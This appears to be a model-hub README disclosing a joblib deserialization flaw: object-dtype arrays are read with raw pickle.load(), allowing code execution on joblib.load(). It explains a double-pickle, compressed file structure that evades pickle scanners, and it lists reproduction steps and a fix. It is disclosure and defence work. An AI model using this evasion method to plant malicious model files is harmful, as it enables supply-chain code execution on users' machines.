YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
Joblib Double-Pickle hasobject ACE + Scanner Evasion PoC
Vulnerability Summary
Library: joblib (tested on 1.5.3, affects all versions with NumpyArrayWrapper)
File: joblib/numpy_pickle.py
Class: NumpyArrayWrapper.read_array() (lines 173-175)
Severity: Critical (Arbitrary Code Execution on joblib.load())
CWE: CWE-502 (Deserialization of Untrusted Data)
Root Cause
When a persisted numpy array has dtype.hasobject == True (i.e., it contains Python objects), NumpyArrayWrapper.read_array() calls raw pickle.load() on the inner data stream:
# joblib/numpy_pickle.py, lines 173-175
def read_array(self, unpickler, ensure_native_byte_order):
...
if self.dtype.hasobject:
# The array contained Python objects. We need to unpickle the data.
array = pickle.load(unpickler.file_handle) # <-- RAW pickle.load!
This is distinct from the outer pickle stream, which is processed by NumpyUnpickler (joblib's custom unpickler subclass). The inner pickle.load() call uses stdlib pickle.load() directly, which executes any __reduce__-based payload.
Attack Vector: Double-Pickle Structure
A joblib file with this attack has two nested pickle streams:
[Outer Pickle Stream - parsed by NumpyUnpickler]
-> NumpyArrayWrapper(dtype=object, hasobject=True)
-> [Inner Pickle Stream - parsed by raw pickle.load()]
-> __reduce__ payload (os.system, exec, etc.)
Why This Evades Scanners
Structural evasion: Security scanners (Picklescan, ModelScan, etc.) typically parse the pickle stream looking for dangerous opcodes (
REDUCE,GLOBAL, etc.). They parse the outer pickle structure and see a benignNumpyArrayWrapperobject. The inner pickle stream containing the actual RCE payload is embedded as raw bytes that are only deserialized at runtime.Compression evasion: Wrapping the file in zlib/bz2/lzma/xz compression means scanners must first decompress to even see the outer pickle structure. Many static analysis tools skip compressed formats or only check known magic bytes.
Combined evasion: Compression + double-pickle = the scanner must decompress, parse the outer pickle, identify the
hasobjectcode path, then parse the inner pickle stream. Most scanners do not implement this level of analysis.
Affected Code Path
joblib.load(filename)
-> _unpickle(fobj, ...)
-> NumpyUnpickler.load()
-> load_build() [sees NumpyArrayWrapper on stack]
-> NumpyArrayWrapper.read(unpickler, ...)
-> read_array(unpickler, ...)
-> pickle.load(unpickler.file_handle) # VULNERABLE - raw pickle!
Reproduction
Prerequisites
pip install joblib numpy
Step 1: Generate PoC files
python create_poc.py
This creates:
poc_plain.joblib- Uncompressed (double-pickle structure visible)poc_zlib.joblib- Zlib compressedpoc_bz2.joblib- BZ2 compressedpoc_lzma.joblib- LZMA compressedpoc_xz.joblib- XZ compressedbenign.joblib- Benign reference file
Step 2: Verify exploitation
python verify_poc.py
This loads each PoC file with joblib.load() and checks for the pwned.txt marker file created by the payload.
Step 3 (optional): Test scanner evasion
pip install picklescan
picklescan --path poc_plain.joblib
picklescan --path poc_zlib.joblib
picklescan --path poc_lzma.joblib
Impact
- Arbitrary Code Execution: Any user calling
joblib.load()on an untrusted.joblibfile is vulnerable. - Supply Chain Risk: Malicious
.joblibmodel files can be distributed via model hubs (HuggingFace, etc.) and will execute code when loaded. - Scanner Bypass: The double-pickle structure combined with compression evades current model scanning tools that only analyze the outer pickle structure.
Suggested Fix
The read_array() method should use a restricted unpickler for the inner pickle.load() call, or at minimum use the same NumpyUnpickler class that processes the outer stream. Alternatively, joblib could restrict the classes allowed during deserialization of object arrays.